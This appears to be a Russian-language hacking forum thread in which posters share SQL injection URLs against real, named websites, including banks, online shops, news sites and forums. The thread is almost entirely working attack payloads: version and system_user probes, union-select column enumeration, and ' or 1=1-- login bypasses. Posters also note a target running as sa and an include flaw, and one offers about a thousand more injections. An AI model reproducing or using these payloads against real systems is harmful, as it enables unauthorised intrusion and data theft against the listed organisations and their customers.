http://abris.info/price/mark1.asp?id=1 or 1=@@version-- http://abris.info/price/mark1.asp?id=1 or 1=(select db_name())-- табличка login там
_http://edu.ru/index.php?page_id=10&action=viewcat&cat=7' - далее жмем на любой форум и видим _http://www.srochno.mk.ru/article.asp?id=8324' Пройдемся по банкам %) _http://www.rs.ru/ru/index.php?id70=320' _http://www.nationalbank.kz/?uid=9E21A7F6-802C-E8FB-3A9822E750174087&docid=178' _http://www.trust.ru/common/promo_redirect.php?cid='13&lid=1&v=0&ul=L3J1L2luZGl2aWR1YWwvc2F2aW5ncy8= _http://www.nbt.tj/?c=44&id=4'4&a=263' _http://www.russlavbank.com/content.phtml?prcenter.newsdetail.276' _http://www.sdm-bank.ru/news/20044' _http://www.mtbank.ru/index.php?action=' _http://www.roscredit.ru/main/newsroom/news/38' _http://www.forexpf.ru/forum/ - уязвим ( 2.1.6 rst exploit ) _http://www.paritate.ru/othernews/610301600'
Ребят а есть ли смысл выкладывать тут иньекции без перебора полей... я есть ли выложить около тысячи. Подставляя одинарную кавычку далеко не уйдешь имхо.
shop.liprom.ru apace+win+mssql жесть... http://shop.liprom.ru/index.php post login ' or 1=1-- pass ' or 1=1-- далле http://shop.liprom.ru/index.php?page=partner&keyval=18381&namekey=17945'+or+1=@@version-- http://shop.liprom.ru/index.php?page=partner&keyval=18381&namekey=17945'+or+1=(select+system_user)-- http://shop.liprom.ru/index.php?page=partner&keyval=18381&namekey=17945'+or+1=(select%20db_name())-- Далее http://shop.liprom.ru/test/ post login ' or 1=1-- pass ' or 1=1-- Ну и инклуд думаю все заметят...
Еще 1 шоп... http://megagym.ru/show_cat2.php?grid=999+union+select+concat(user(),char(58),database(),char(58),version())/*
nationalbank.kz под sa запущен http://www.nationalbank.kz/?uid=9E21A7F6-802C-E8FB-3A9822E750174087&docid=178+or+1=(select+system_user)--
Code: http://section3.net/moblog/big.php?img=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*&pg=1 Code: http://www.hallmarkstudentministry.com/moblog/big.php?img=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*&pg=1
http://quiddich.voldemort.ru/forum.php?forum=16&sid=&skey=&topic=-599+union+select+1,2,user(),4,5,6,7,8,9/*
Code: http://www.teplo-tech.ru/?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*&open=1 Code: http://www.belvar.com/new/ru/production.html?id=-1+union+select+user()/* Code: http://www.meteoprog.com.ua/table.php?cityid=-1+union+select+1+from+admin/*
http://sax777.com/?act=-2%20union%20select%201,2,concat(version(),char(32),user(),char(32),database()),4,5,6,7,8/* Нашел, когда увидел вот этот http://hacker.sax777.com/ "хацкерский" квест.